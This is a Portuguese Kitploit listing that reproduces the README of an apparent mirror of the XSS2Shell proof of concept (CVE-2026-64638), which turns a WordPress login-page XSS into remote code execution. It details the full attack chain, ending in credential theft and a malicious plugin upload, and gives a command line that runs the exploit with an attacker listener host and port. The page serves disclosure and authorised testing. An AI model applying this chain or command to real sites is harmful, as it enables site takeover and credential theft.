Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-64638 — # XSS2Shell (CVE-2026-64638) Espelho de PoC de XSS pré-autenticação para RCE no WordPress — WordSec, MIT; para testes de segurança autorizados | Kitploit
Ferramentas/GitHubGitHub/hackspeak/cve-2026-64638
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAtaque Adversário
GitHubhackspeak/cve-2026-64638

CVE-2026-64638

# XSS2Shell (CVE-2026-64638) Espelho de PoC de XSS pré-autenticação para RCE no WordPress — WordSec, MIT; para testes de segurança autorizados

Ver Repositório
15há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-64638 — XSS2Shell: XSS pré-autenticação na página de login do WordPress → RCE no servidor

Imagem de distribuição do HackSpeak. Este repositório é uma imagem de distribuição do PoC educacional XSS2Shell (CVE-2026-64638) publicado pela WordSec, com código idêntico ao upstream; upstream sob Licença MIT, Copyright (c) 2026 WordSec.

⚠️ Exclusivamente para pesquisa de segurança e testes autorizados; execute apenas em sites WordPress que você possua ou para os quais possua autorização formal por escrito; o PoC gera e remove publicações temporárias — não o utilize contra administradores de terceiros ou sistemas de produção.

Resumo da vulnerabilidade

XSS2Shell (CVE-2026-64638) é um XSS refletido pré-autenticação na página de login do WordPress (wp-login.php), que pode ser elevado por uma cadeia completa até execução de código PHP no servidor (RCE).

  • Causa raiz: divergência de parsing entre strip_tags() do PHP e o KSES do WordPress (wp_kses_post()) — ao inserir um espaço entre < e o nome da tag (ex.: ), o primeiro trata como texto comum e preserva, enquanto o segundo interpreta como elemento HTML válido (// estão todos na allowlist);
< area
<area>
<div>
<button>
  • XSS: sem necessidade de autenticação, basta enviar um nome de usuário forjado para acionar a execução na página de erro de login;
  • Cadeia RCE: DOM Clobbering para sequestrar ajaxurl → user-profile.js nativo da página de login dispara automaticamente um POST jQuery → REST API JSONP (_jsonp) → Same Origin Method Execution (SOME, Paulos Yibelo 2022) → cliques entre janelas no botão de autorização de Application Password do administrador → roubo das credenciais da API → publicação de uma página contendo <script> → upload de plugin ZIP malicioso → execução direta de PHP (sem necessidade de ativação);
  • Impacto: quase todas as versões do WordPress (4.9.0–7.0.2); correção na 7.0.3 (2026-08-06, emergencial), já portada para todos os ramos de manutenção desde a 4.7.
  • Uso

    root@kitploit:~
    python3 xss2shell_poc.py -t http://wordpress.test --lhost 192.168.1.100 --lport 8080 -c "whoami"
    
    ParâmetroDescrição
    -t, --targetEndereço base do WordPress (com http/https, normalização automática da barra final)
    -c, --commandComando a executar quando o shell estiver pronto
    --lhost / --lportEndereço/porta de escuta (lport 0 = aleatório)
    --keepMantém a página temporária de publicação (por padrão é removida)

    Dependências: Python 3.7+, zero pacotes de terceiros; requer login de administrador no site alvo e abertura da URL do atacante (uma interação).

    Aviso legal

    • Exclusivamente para pesquisa de segurança, validação de vulnerabilidades e testes defensivos; execute em ambientes descartáveis e não utilize contra sistemas sem autorização.
    • O PoC é código de uso educacional, baseado em análise técnica pública; antes de usar, leia a documentação upstream e os limites de autorização do alvo.

    Links de referência

    • Repositório upstream (fonte deste PoC): https://github.com/wordsec/XSS2Shell
    • Divulgação oficial do pwn.ai: XSS2Shell — https://pwn.ai/blog/xss2shell
    • Boletim oficial de segurança do WordPress: GHSA-52p2-r8wf-jcrf — https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-52p2-r8wf-jcrf
    • Anúncio do lançamento do WordPress 7.0.3: https://wordpress.org/news/2026/08/wordpress-7-0-3-release/
    • Cobertura do The Hacker News: https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
    • Análise técnica da WordSec + explicação do PoC: https://wordsec.net/blog/xss2shell-wordpress-pre-auth-xss-to-rce-cve-2026-64638
    Baixar ferramenta